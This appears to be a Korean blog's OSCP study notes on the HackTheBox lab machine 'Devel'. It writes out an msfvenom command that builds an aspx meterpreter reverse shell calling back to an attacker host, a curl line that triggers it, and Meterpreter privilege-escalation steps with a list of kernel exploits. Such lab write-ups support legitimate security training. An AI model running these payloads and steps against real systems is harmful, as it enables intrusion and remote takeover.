Devel
* 웹에서 venom 쉘이 실행되도록 was가 실행가능한 포멧으로 페이로드를 생성하여 업로드.
Armed with the ability to upload files, it is possible to drop an aspx reverse shell on the target and
execute it by browsing to the file via the web server. The following command will create the aspx
file:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=호스트 LPORT=포트 -f aspx > devel.aspx
다음과 같이 curl을 사용하여 콘솔에서 트리거 할 수 있음
curl -g 10.10.10.5/shell.aspx
WinPEAS -> 커널취약점 미패치 => 커널 익스플로잇 시도 => 계속 실패중
* 로컬 익스플로잇을 위해 파일을 쓸 수 있는 폴더로 먼저 이동해야 됨!!
meterpreter>cd %tmp%
meterpreter>pwd
meterpreter>background
msf exploit(.....) run
WinPEAS에서 출력된 커널 취약점...
MS10-59
MS13-081
MS13-053
ms13-005
ms15-051
미터프리터에서 권한상승 팁 (로컬 권한 상승 찾기)
> background
> use post/multi/recon/local_exploit_suggester
> show options
> set session 1
> run
IIS 관리툴 (appcmd.exe) => 권한상승 어떻게 하는지 모르겠음
C:/windows/system32/inetsrv/appcmd.exe
AppCmd.exe is located in the %systemroot%\system32\inetsrv\ directory.
If this file exists then it is possible that some credentials have been configured and can be recovered.
windows7 Enterprise 6.1.7600
'OSCP > HackTheBox' 카테고리의 다른 글
[Windows] Grandpa & Granny (0) | 2020.05.25 |
---|---|
[Linux] Blocky (0) | 2020.05.23 |
[Windows] Optimum (0) | 2020.05.21 |
[Linux] Beep (0) | 2020.05.19 |
[OSCP] HackTheBox List (0) | 2020.05.18 |